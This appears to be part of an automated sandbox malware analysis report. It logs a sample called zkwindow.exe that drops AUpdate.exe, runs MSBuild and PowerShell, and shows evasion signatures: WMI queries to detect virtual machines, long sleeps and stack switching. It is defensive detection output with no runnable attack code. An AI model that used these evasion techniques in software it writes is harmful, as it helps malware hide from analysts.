Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe API/Special instruction interceptor: Address: 6CCB7C44
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe API/Special instruction interceptor: Address: 6CCB7945
Source: C:\Windows\SysWOW64\cmd.exe API/Special instruction interceptor: Address: 6CCB3B54
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2520000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2720000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 4720000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 1410000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 3130000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2F50000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\zkwindow.exe Thread delayed: delay time: 412000 Jump to behavior
Source: C:\Users\user\Desktop\zkwindow.exe Thread delayed: delay time: 412000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4388 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5413 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 1908 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 7639 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vpdcuvm Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe API coverage: 2.5 %
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe API coverage: 3.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\zkwindow.exe TID: 7808 Thread sleep time: -412000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\zkwindow.exe TID: 7808 Thread sleep time: -412000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep count: 4388 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904 Thread sleep count: 5413 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040 Thread sleep time: -17524406870024063s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436 Thread sleep time: -23980767295822402s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -39992s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436 Thread sleep time: -59891s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436 Thread sleep time: -59781s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -43330s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436 Thread sleep time: -59672s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -33698s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436 Thread sleep time: -59563s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -59666s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436 Thread sleep time: -59453s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -55443s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436 Thread sleep time: -59344s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -30443s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -41168s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -45394s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -56410s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -44845s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -56086s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -44973s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -33215s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3228 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -56667s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -32042s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -46293s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -41362s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5872 Thread sleep time: -1200000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -52403s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -57070s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -42331s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -55824s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -35307s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -37564s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -39329s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -36240s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -54528s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -40276s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -50770s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -36092s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -32949s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -49871s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612 Thread sleep time: -56116s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5960 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013D44C4 FindFirstFileExW, 0_2_00007FF7013D44C4
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013D4648 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7013D4648
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008E91B4 FindFirstFileW,FindFirstFileW,free, 9_2_008E91B4
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D4C85C FindFirstFileW,FindNextFileW,FindClose, 11_2_00D4C85C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D68844 FindFirstFileW,FindNextFileW,FindClose, 11_2_00D68844
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D6082C FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 11_2_00D6082C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D609B8 FindFirstFileW,FindNextFileW,FindClose, 11_2_00D609B8
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C4B190 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 11_2_00C4B190
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C4B75C FindFirstFileW,FindClose, 11_2_00C4B75C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008EA254 free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free, 9_2_008EA254
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008ED99C GetProcessAffinityMask,GetSystemInfo, 9_2_008ED99C
Source: C:\Users\user\Desktop\zkwindow.exe Thread delayed: delay time: 412000 Jump to behavior
Source: C:\Users\user\Desktop\zkwindow.exe Thread delayed: delay time: 412000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 39992 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59891 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 43330 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59672 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 33698 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59563 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59666 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55443 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30443 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 41168 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 45394 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56410 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 44845 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56086 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 44973 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 33215 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56667 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 32042 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 46293 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 41362 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 52403 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57070 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 42331 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55824 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 35307 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 37564 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 39329 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 36240 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 54528 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 40276 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 50770 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 36092 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 32949 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 49871 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56116 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noreply@vmware.com0
Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0
Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1!0
Source: MSBuild.exe, 0000000E.00000002.2491991927.00000000008DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYY&
Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0/
